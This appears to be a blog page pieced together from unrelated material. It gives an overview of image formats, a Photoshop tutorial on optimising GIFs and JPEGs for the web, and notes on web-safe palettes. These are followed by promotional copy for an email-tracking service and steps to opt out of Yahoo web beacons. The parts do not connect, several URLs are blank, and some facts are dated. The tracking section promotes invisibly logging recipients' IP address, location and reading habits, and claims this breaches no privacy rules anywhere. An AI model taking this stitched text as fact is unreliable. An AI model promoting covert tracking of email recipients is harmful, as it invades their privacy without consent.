lossless compression for bi-level (black and white, no grey) images. Some high-end digital cameras have the option to save images in the TIFF format, using the LZW compression algorithm for lossless storage. The TIFF image format is not widely supported by web browsers, and should not be used on the World Wide Web. TIFF is still widely accepted as a photograph file standard in the printing industry. TIFF is capable of handling device-specific color spaces, such as the CMYK defined by a particular set of printing press inks.

The RAW image format is a file option available on some digital cameras. It usually uses a lossless compression and produces file sizes much smaller than the TIFF format. Unfortunately, the RAW format is not standard among all camera manufacturers and some graphic programs and image editors may not accept the RAW format. The better graphic editors can read some manufacturer's RAW formats, and some (mostly higher-end) digital cameras also support saving
images in the TIFF format directly. There are also separate tools available for converting digital camera raw image format files into other formats, one such tool being Dave Coffin's dcraw, which is made available under a combination of GNU General Public License and public domain licenses.

Adobe's Digital Negative Specification is a recent (September 2004) attempt at standardizing the various "raw" file formats used by digital cameras.

The PNG (Portable Network Graphics) file format is regarded and was made as the free and open successor to the GIF file format. The PNG file format supports true color (16 million colors) whereas the GIF file format only allows 256 colors. PNG excels when the image has large areas of uniform color. The lossless PNG format is best suited for editing pictures, and the lossy formats like JPG are best for final distribution of photographic-type images because of smaller file size. Many older browsers do not yet support the PNG file format. The Adam7-interlacing allows an early preview even when only a small percentage of the data of the image has been transmitted.

GIF (Graphic Interchange Format) is limited to an 8-bit palette, or 256 colors. This makes the GIF format suitable for storing graphics with relatively few colors such as simple diagrams, shapes and cartoon style images. The GIF format supports animation and is still widely used to provide image animation effects.

The BMP (bit mapped) format is used internally in the Microsoft Windows operating system to handle graphics images. These files are typically not compressed resulting in large files. The main advantage of BMP files is their wide acceptance and use in Windows programs. Their large size makes them unsuitable for file transfer. Desktop backgrounds and images from scanners are usually stored in BMP files.

The XPM format is the default X Window System picture format (very popular in the Linux world). Its structure is based on the string format of the C programming language. Because XPM was designed to be human-readable, and is stored as uncompressed plain-text, the file size of these pictures can be more than twice as large as uncompressed binary bitmap files (such as BMP, uncompressed TIFF, MacOS-PICT, or Irix-RGB formats). This format is unsupported by most non-Unix software and operating systems (though many web-browsers retain display support for the XBM subset, which was the minimal image format in the early days of the WWW).

The MrSID (Multiresolution Seamless Image Database) format is a wavelet compression format used mostly by Geographic Information Systems to store massive satellite imagery for map software.

Vector formats
As opposed to the raster image formats above (where the data describes the characteristics of each individual pixel), vector image formats contain a geometric description which can be rendered smoothly at any desired display size.

SVG (Scalable Vector Graphics) is an open standard created and developed by the World Wide Web Consortium to address the need (and attempts of several corporations) for a versatile, scriptable and all-purpose vector format for the web and otherwise. The SVG format does not have a compression scheme of its own, but due to the textual nature of XML, an SVG graphic can be compressed using a program such as gzip. Because of its scripting potential, SVG is a
key component in web applications: interactive web pages that look and act like applications

GIF and JPEG are currently the primary file types for graphics on the Internet. This article provides an overview of each of them, as well as when each format should be used.

The GIF Format
The GIF format is one of the most popular formats on the Internet. Not only is the format excellent at compressing areas of images with large areas of the same color, but it is also the only option for putting animation online (unless you want to use Flash or other vector-based animation formats, which typically cost more). The GIF89a format also supports transparency, and interlacing.

GIF files support a maximum of 256 colors, which makes them practical for almost all graphics except photographs. The most common method of reducing the size of GIF files is to reduce the number of colors on the palette. It is important to note that GIF already uses the LZW compression scheme internally to make images as small as possible without losing any data

When to use them
Generally, GIF files should be used for logos, line drawings and icons. Avoid using it for photographic images, and graphics which have long stretches of continuous-tone in them. When you're designing GIF files, avoid using gradients and turn off anti- aliasing where possible to minimize the file size.

The JPEG Format
The JPEG format, with its support for 16.7 million colors, is primarily intended for photographic images. The internal compression algorithm of the JPEG format, unlike the GIF format, actually throws out information. Depending on what settings you use, the thrown out data may or may not be visible to the eye. Once you lower the quality of an image, and save it, the extra data cannot be regained so be sure to save the orginal

When to use
As a rule, the JPEG format should be used on photographic images, and images which do not look as good with only 256 colors.

optimize an image for the web using adobe photoshop
JPEG v. GIF - Which format should I use?
GIFs work well for images with large blocks of color and sharp edges. Notice the difference
in file size. Using GIF format for this type of image produces a small file.
GIF Format, 3 KB

JPEG Format, 16 KB

Zoom of rose.gif

Zoom of rose.jpg

JPEGs work well for images with continuous tones, such as photographs.
Again, notice the file size. In this case, the JPEG is smaller.
GIF Format, 38 KB

JPEG Format, 20 KB

This document explains how to reduce an image's file size and format it for use on the Web. It is important to make image files as small as acceptable quality will permit, since smaller images dramatically decrease download time when users access your Web pages.

You will need:

an image, ready for processing, and
access to Adobe Photoshop

Reduce the physical size of the image.

Most people are more comfortable with images that fit completely on their screen. Reducing the physical size of images also dramatically reduces the file size. For most machines, an image size of more than 550 pixels wide and 375 pixels high is safe.

Open your image in Photoshop by choosing File > Open . . . from the menu bar, locating your file, and clicking the "Open" button.
Under the Image menu, select Image Size . . .
Make certain that the "Constrain Proportions" and "Resample Image"check boxes are checked in the "Image Size" dialog box.
Under the "Pixel Dimensions," you will see numerical fields for "Width" and "Height." If the largest value is the "Width," replace it with the number 550. If the largest value is the "Height," replace it with the number 375.
Click "OK."
If the image looks satisfactory, save it by choosing File > Save from the menu bar.

It is a good idea to save this image under a different file name, leaving the original scanned image in its original form. That way, if you decide to start over, you will not need to scan the image all over again.

Change the image resolution.

Most monitors display images at 72 pixels per inch. Higher resolution will be lost on the computer screen, though not in print. If the intended use of the image is for computer display, such as a Web page or PowerPoint presentation, you should reduce its resolution to 72 pixels per inch.

Open your image in Photoshop.
Under the Image menu, select Image Size . . .
Make certain that the "Constrain Proportions" and "Resample Image" check boxes are checked.
In the "Print Size" section, there is a "Resolution" numerical field. Make sure that "pixels/inch" is selected in the pull-down menu to its right.
If the number in this field is larger than 72, change it to 72.
Click "OK."
If the image looks satisfactory, save it by choosing File > Save from the menu bar.

Change the compression for JPEG files.

One of the most common file formats on the Web is called "JPEG." It is commonly used with photographs, paintings, and any image which requires many shades of color. JPEG images have a relatively small file size compared to other digital file formats.

From the File menu, select Save As . . .
Select a new name for the file, making sure to add the file extension ".jpg" to the end of the file name.

Be sure to save your file under a different name from the original scanned image, since the following process cannot be undone.

Make certain that "JPEG" appears in the "Format" or "Save as" pull-down menu, and select it from the menu if it does not.
Click the "Save" button, which will bring up a '"JPEG Options" dialog box.
In the "Format Options" section, select "Progressive."
In the '"Image Options" section, enter a number from 0 (lowest quality) to 10 (highest quality) in the "Quality" field. Most images look fine saved between 3 and 5.
Click "OK."
If the new image looks satisfactory, you can return to the original and try repeating the above steps with a lower "Quality." If the new file looks bad, return to the original and repeat the above steps with a higher "Quality."
When you have finished, save the final copy of your image, remembering to add the ".jpg" file extension to its name.

Change the number of colors for GIF files.

The other common Web file format is the "GIF" format, which uses a more limited color palette than the "JPEG" format. GIF is used for files with small numbers of colors, such as line drawings, icons, and graphs. The most common technique for shrinking these files is to remove any excess colors.

Select Image > Mode > Indexed Color . . . from the menu bar. If this is already selected, select Image > Mode > RGB Color, then return to this menu and select Indexed Color . . .
Select "Adaptive" from the "Palette" pull-down menu.
Select "8 bits/pixel" from the "Color Depth" pull-down menu.
From the "Dither" pull-down menu, select "None."
Click the "OK" button.
Choose Image > Mode > RGB Color from the menu bar, then return to this menu and select Indexed Color . . .
The "Palette" drop-down menu should now default to "Exact." At this point, you can click "OK" and then save your file. However, if you need further space saved, continue while preserving the original. The following steps can drastically reduce file size, but they can cause a loss of quality, so it is best not to work with the original.
Select "Adaptive" from the "Palette" drop-down menu in the "Indexed Color" dialog box.
Look at the number in the "Colors" field and remember it or write it down.
Under "Color Depth," select the "bits/pixel" level so that the number of "Colors" is half the number you wrote down.
Click the "OK" button and examine the image. If it looks fine, save it under a new file name and repeat the process for the next lowest number of "Colors."
When you have finished, save the final copy of your image by choosing File > Save as . . . from the menu bar, selecting "CompuServe GIF" as the file format, adding the ".gif" file extension to its name, and clicking the "Save" button.

Transparent GIFs Using Adobe Photoshop, the image below was drawn against a white background. The copy on the left was saved in GIF format without using transparency - notice how the background of the image remains white although the background of the table is set to yellow. The copy on the right was also saved in GIF format, but with a transparent background.



Color Palettes
To display a full-color image on a 256-color computer, an application must simulate colors it can't actually display. The computer does this by dithering: combining pixels from its 256-color palette into patterns that approximate other colors. At a distance the human eye merges these dithered patterns into another color, but up close the image appears speckled. Because different operating systems and applications build color palettes according to their particular needs, color variance arises when moving across platforms and programs. You should prepare for the fact that visitors to your website will be using different systems with various color settings.
There is, in fact, no one universal 8-bit palette that will not dither on all platforms. However, there is a 216-color palette that will not dither on most. The web-safe palette (or browser-safe palette) consists of 216 colors that display the same on both Macintosh and PC operating systems. These colors will also display the same on PC systems using a low color depth. By using the web-safe palette you will ensure that the graphics you create look the same no matter what system or browser the viewer is using. When displaying graphics created with non web-safe palettes, the browser tries to approximate the color through dithering. This may work fine for some graphics, but will often produce results far from what you intended.
Web-safe colors should be used for creating images with large blocks of solid color. Photographs should not be remapped to web-safe color, as they will take on a blocky appearance.
Choosing a web-safe palette in
Adobe Photoshop

Open Adobe Photoshop

Click on the Swatches tab of the floating palette for Color, Swatches, Brushes

Click on the arrow in the upper right, on the same line as the Swatches tab.

Choose Replace Swatches. (Note: "Load Swatches" will just add the new palette to the end of the current palette, without indicating which palette is which).

Open the Color Palettes folder: c:\program files\adobe\photoshop 5.0\goodies\color palettes

Choose the file Web Safe, and click Load.
A web-safe color palette is now loaded.

true color
(millions of colors)

Screen shot of image using
lower color depth (256 colors)

When web-safe colors are used to create the image, it looks the same when
displayed in either mode.

true color
(millions of colors)

Screen shot of image using
lower color depth (256 colors)

Although web-safe colors work well for creating images with large blocks of color, photographs
should not be remapped to web-safe color. The reason the first image looks better is because
dithering works quite nicely with continuous tone images. In fact, all JPEGs are dithered.
Look at the difference below:

Saved as a jpg,
using millions of colors

Saved as a jpg,
after conversion to web safe colors

GIF Cruncher and JPEG Cruncher
Free on-line tools for compressing GIFs and JPEGS are available at and These tools are very useful for automatically reducing file size and comparing different levels of quality. Each tool will return several versions of your image, ranging from high quality and large file size, to low quality and low file size. Choose the file which best suits your needs, and save it to your disk.
The Photoshop CS2 Book for Digital Photographers (with examples)

email tracking

email tracking

a very useful resource.
be ethical!

Donate Ur knowledge
rahul dutt avasthy
browse below. - What is it and how does it work? What is MailTracking? MailTracking is the most powerful and reliable email tracking service that exists today. In short - MailTracking tells you when email you sent gets read / re-opened / forwarded and so much more

How do I send a tracked email? There are two ways you can send tracked emails:

Simply add: to the end of your recipients email address (they won't see this)
Install our ActiveTracker plugin to add the tracking for you.
Testing? If you send tracked emails to yourself, your anti-spam filters may block them (people don't usually write to themselves) - so we recommend you test by sending to other people. What will you tell me about the tracked emails I send? MailTracking will endeavour to provide the following in your tracking reports:

Date and time opened
Location of recipient (per their ISP city /town)
Map of location (available on paid subscriptions)
Recipients IP address
Apparent email address of opening (if available)
Referrer details (ie; if accessed via web mail etc)
URL clicks
How long the email was read for
How many times your email was opened
If your email was forwarded, or opened on a different computer
All messages sent via MailTracking benefit from our SPF compliant and Sender-ID compliant mail servers. This confirms safe transmission of your messages, and also enables us to report delivery status to you (including: bounce-backs, delays and success notifications). Delivery information is listed in your Personal Tracking Page. Note: does not use or contain any sp‌y-ware, ma‌l-ware, nor vi‌rues, it is not ill‌egal to use, and does not breach any pri‌vacy reg‌ulations in any countries. What else does MailTracking do? There are lots of great features available to you - these include the following sending options:
Certified email
Ensured-Receipts and retractable emails
Invisible tracking
Self-Destructing emails
Block printing
Block forwarding
Adobe Acrobat PDF Document Tracking
Secure Encypted emails
Track MS Word or Excel documents
For more details regarding sending options, please see our: FAQ's
You can also choose how to receive your receipts:
In your Personal Tracking Page (when you log in)
Email ReadNotifications
Legal Proof-of-Opening receipts
Delivery Service Notifications (DSN's)
SMS alert on your cell-phone or pager
Instant Messenger
These options are available to you from "My Account" in Member Utilities. Getting started MailTracking offers a lot of features and sending options, but it is very easy to use our service. On start up, your account is already configured per our 'Recommended' tracking defaults - and we will automatically send you email ReadNotifications when your tracked emails are opened. If you'd like to take us for a 'test drive', please sign up for no-obligation free trial from the Homepage

Disable yahoo from tracking you

As you all know, Yahoo! upgraded its features and the capacities of the mail accounts have grown to 2GB. That's good for sure, but the "monitoring" methods that we all have been far too familiar with in the last couple of years have been renewed with this move also. Yahoo! is now keeping track of which sites its members that are getting into groups or using Yahoo! services are visiting and storing this data with a method called "Web Beacons". The aim is to give these statistics to the partner companies arranged by agreement and to improve the "advertisement guiding" function.

However, those who are bothered by this and do not want to be kept track of have still a choice. Yahoo! has hidden this option way deep inside somewhere but I'm declaring it here in case there are people who want it anyway:

1. Go to the address


and click the "Cookies" link under the "Special Topics" column.

2. Click the "Web Beacons" link under the "Reference Links" Column.

3. On this page, click the "click here to opt out" link toward the end of the third paragraph under the "Outside the Yahoo! Network" title.

4. After a while, a page that says you have been out of the monitoring program will load. Without doing anything, close that page or continue your usual surfing by typing another address in the address bar. (Do NOT click the "Cancel Opt-out" button, your action will be cancelled!)

5. You're done! Now Yahoo! will not record what you're doing during surfing.

You can let your friends that might be interested know about this; since no matter how "innocent" it may seem, it's still a violation of privacy